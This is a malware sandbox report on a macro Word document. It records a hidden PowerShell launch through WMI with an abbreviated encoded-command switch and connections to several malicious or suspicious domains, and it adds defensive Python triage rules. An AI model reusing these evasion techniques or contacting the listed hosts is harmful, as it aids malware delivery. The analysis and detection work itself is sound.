File name: Documentation-906738957.doc

Full analysis: https://app.any.run/tasks/00f55fa5-59c5-4385-8cb0-c801ab5e0321
Verdict: Malicious activity
Analysis date: September 30, 2020, 13:49:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, maldoc-51
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Nobis., Author: Anas Chevalier, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 19:26:00 2020, Last Saved Time/Date: Tue Sep 29 19:26:00 2020, Number of Pages: 1, Number of Words: 3401, Number of Characters: 19391, Security: 8
MD5: C4F5D61353C305C328156FC911CCBD8B
SHA1: ADB7AF0BDB43F0A43218D3CC517AA8C1966FC15B
SHA256: 13938870BEF2D81300707E7A951B93345128E511A2970AFB62915FA26EB6D1AC
SSDEEP: 1536:NgpsKaEWMQsq98U1tqnyBCVXqf+m/zqux9kbM:SnPWMQsqqUnCZFmGY9kbM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as-is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    No malicious indicators.
  • SUSPICIOUS
    • Executed via WMI: POwersheLL.exe (PID: 3008)
    • Creates files in the user directory: POwersheLL.exe (PID: 3008)
    • PowerShell script executed: POwersheLL.exe (PID: 3008)
  • INFO
    • Reads settings of System Certificates: POwersheLL.exe (PID: 3008)
    • Creates files in the user directory: WINWORD.EXE (PID: 2564)
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 2564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Nobis.
Subject: -
Author: Anaïs Chevalier
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:29 18:26:00
ModifyDate: 2020:09:29 18:26:00
Pages: 1
Words: 3401
Characters: 19391
Security: Locked for annotations
Company: -
Lines: 161
Paragraphs: 45
CharCountWithSpaces: 22747
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs: Title (1)
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
All screenshots are available in the full report
Total processes: 39
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph

start -> winword.exe (no specs) -> powershell.exe (launched through WMI; in the process table its parent is wmiprvse.exe, not WINWORD.EXE)

Process information

PID 2564
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Documentation-906738957.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 3008
  CMD: POwersheLL -ENCOD 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
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
  Parent process: wmiprvse.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
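The two process records above carry the detection-relevant facts of this sample: PowerShell was started with a mixed-case image name, its parent is wmiprvse.exe rather than WINWORD.EXE (the macro used WMI to create the process), and the payload is passed through the -ENCOD switch, which PowerShell accepts because it resolves any unambiguous prefix of -EncodedCommand. The Python below is an added example, not ANY.RUN's code or the report's export format: it runs three rules over constructed process-creation events that mirror this process tree and decodes the encoded-command payload. The ProcEvent schema, the rule names and the SAMPLE_SCRIPT payload are assumptions; the real -ENCOD payload is not on the page, so a harmless constructed script stands in for it.

```python
import base64
import binascii
from dataclasses import dataclass

# Image names are compared case-insensitively: the report logs the binary as
# POwersheLL.exe, and a case-sensitive match would miss it.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WMI_HOST = "wmiprvse.exe"


@dataclass
class ProcEvent:
    """One process-creation record (hypothetical schema, not ANY.RUN's export format)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


def encode_command(script: str) -> str:
    """Build what PowerShell expects after -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def is_encoded_switch(token: str) -> bool:
    """True for -EncodedCommand, its alias -ec, and any prefix PowerShell accepts (-e, -enc, -ENCOD ...)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or "encodedcommand".startswith(name)


def extract_encoded_command(cmdline: str):
    """Decode the payload following an encoded-command switch; None if absent or undecodable."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_switch(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None  # switch present but payload unreadable: still worth flagging
    return None


def triage(events):
    """Apply three rules to a list of ProcEvent and return the findings in rule order."""
    findings = []
    for ev in events:
        image, parent = ev.image.lower(), ev.parent_image.lower()
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append({"pid": ev.pid, "rule": "office-spawned-shell", "detail": parent})
        # Win32_Process.Create from VBA makes wmiprvse.exe the parent, so the
        # Office-parent rule above never fires for this sample; this one does.
        if parent == WMI_HOST and image == "powershell.exe":
            findings.append({"pid": ev.pid, "rule": "wmi-spawned-powershell", "detail": parent})
        if any(is_encoded_switch(t) for t in ev.cmdline.split()):
            findings.append({"pid": ev.pid, "rule": "encoded-command",
                             "detail": extract_encoded_command(ev.cmdline)})
    return findings


# Constructed events mirroring the report's process tree. The real -ENCOD
# payload is not on the page, so a harmless constructed script stands in.
SAMPLE_SCRIPT = "Write-Output 'constructed stand-in payload'"
SAMPLE_EVENTS = [
    ProcEvent(2564, "WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\admin\Desktop\Documentation-906738957.doc"',
              "explorer.exe"),
    ProcEvent(3008, "POwersheLL.exe",
              "POwersheLL -ENCOD " + encode_command(SAMPLE_SCRIPT),
              "wmiprvse.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"PID {f['pid']}: {f['rule']} -> {f['detail']}")
```

Running it yields only the WMI-parent and encoded-command findings for PID 3008; a rule that keys solely on WINWORD.EXE spawning a script host stays silent, which is the point of the WMI launch. The decoded text is what the sandbox's "PowerShell script executed" signature would have seen; on a real event the same function hands it to whatever string or URL extraction comes next.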
Total events: 1 922
Read events: 1 015
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 5

Dropped files

PID 2564  WINWORD.EXE
  C:\Users\admin\AppData\Local\Temp\CVRAAD7.tmp.cvr
  Type: -   MD5: -   SHA256: -

PID 3008  POwersheLL.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0NTQTX39Y6VSJDY78YUP.temp
  Type: -   MD5: -   SHA256: -

PID 2564  WINWORD.EXE
  C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
  Type: tlb   MD5: 4E1261458C3E297C14700BD7AB598941
  SHA256: B273CF320C220000F00A8AB914A2611428A1C124D8C3AF6F1353F0A652E7FEAB

PID 2564  WINWORD.EXE
  C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documentation-906738957.doc.LNK
  Type: lnk   MD5: 33D0181B87DAFA0D7D18293F442F4FE7
  SHA256: 2A923C00621CD6FD48EEB445CDD14893B03453DD19D02D04DF2F006BA4FC58DE

PID 2564  WINWORD.EXE
  C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Type: pgc   MD5: 0FAA352AC76D2E686DE719AC808E0BD7
  SHA256: 6AA1BFDEBFDD7831762FADD886B0A1D92CD169C27E3F7CE497C01B7D685DC037

PID 2564  WINWORD.EXE
  C:\Users\admin\Desktop\~$cumentation-906738957.doc
  Type: pgc   MD5: 7BCDD145A0CBD8EB71B32D2A97FD0E09
  SHA256: 7261445B404B79491AA39A6758B08B24103E11EE2B2E9F4BDE880E9AAFF5F36B

PID 3008  POwersheLL.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ab9db.TMP
  Type: binary   MD5: 36FE326E12493E805B62142553A1E43C
  SHA256: 3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F

PID 2564  WINWORD.EXE
  C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Type: text   MD5: E51C8E015688371AC4BAC6A289C081DD
  SHA256: D613A53BB4A4BA2E71BFB07553B9F8233F1924C7AEF302F0609909FEC6FBAB12

PID 3008  POwersheLL.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Type: binary   MD5: 36FE326E12493E805B62142553A1E43C
  SHA256: 3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F

None of these files is a payload: the MSForms.exd stub under Temp\VBE is the type-library cache the VBA editor writes when the macro project loads the MSForms library, the ~$ files are Office owner/lock files, and the rest are recent-items and jump-list bookkeeping. The artifact of interest in this run is the PowerShell command line, not a dropped binary.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 5
DNS requests: 8
Threats: 0

HTTP requests

No HTTP requests

Connections

PID   Process         IP:port               Domain                              ASN                         CN  Reputation
3008  POwersheLL.exe  192.254.185.2:443     sunnysidecafemi.com                 Unified Layer               US  malicious
3008  POwersheLL.exe  170.249.199.66:443    visum360.com.uy                     -                           US  unknown
3008  POwersheLL.exe  75.119.215.217:443    murfreesboro.fairwayconcierge.com   New Dream Network, LLC      US  suspicious
-     -               185.149.112.234:443   ryner.net.au                        Skylinevision Telecom LLC   CZ  suspicious
3008  POwersheLL.exe  67.205.57.212:443     yungen.kevinmccollow.com            New Dream Network, LLC      US  unknown

All five connections are to port 443 and no HTTP content was recorded for them, so the "Threats: 0" IDS result below says nothing about what the script tried to fetch; the domain reputations and the fact that PowerShell, not a browser, opened them are the usable signal. The fourth entry has no PID or process listed in the report.

DNS requests

Domain                              IP                Reputation
murfreesboro.fairwayconcierge.com   75.119.215.217    suspicious
ryner.net.au                        185.149.112.234   suspicious
sunnysidecafemi.com                 192.254.185.2     suspicious
visum360.com.uy                     170.249.199.66    unknown
yungen.kevinmccollow.com            67.205.57.212     unknown

Threats

No threats detected
No debug info